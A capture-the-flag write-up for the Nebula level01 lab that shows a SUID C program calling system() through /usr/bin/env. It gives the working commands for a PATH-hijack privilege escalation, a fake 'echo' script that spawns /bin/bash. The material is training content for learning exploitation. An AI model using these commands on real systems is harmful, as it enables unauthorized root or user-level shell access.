Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
60 lines (42 sloc) 1.79 KB

Nebula level01

https://exploit-exercises.com/nebula/level01/

Goal

Call getflag from an account that has permissions to run it. In these exercises, the goal is to call getflag from any of the flag... accounts.

Source code

flag01.c

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

Exploit

From Wikipedia:

"/usr/bin/env is a shell command for Unix and Unix-like operating systems. It is used to either print a list of environment variables or run another utility in an altered environment without having to modify the currently existing environment. Using env, variables may be added or removed, and existing variables may be changed by assigning new values to them."

Running commands with /usr/bin/env will allow you to run programs with the current environment. Unfortunately, for this script, it means that the user can override PATH to point to their own echo executable, which can be elevated to run a root shell because level01 is a SUID program (which means it can run as root even when the program that calls it is not root).

To exploit, create a bash script called echo that opens a shell. Add the directory containing echo to the PATH, and then run the program. Because flag01 is a SUID program, the echo script will be run as the flag01 user, and you can get a shell with that user. These are the commands to exploit the system:

touch ~/echo
echo "/bin/bash" > ~/echo
chmod +x ~/echo
export PATH=~:$PATH
./flag01

These commands open a shell as the flag01 user. Now we can just run getflag.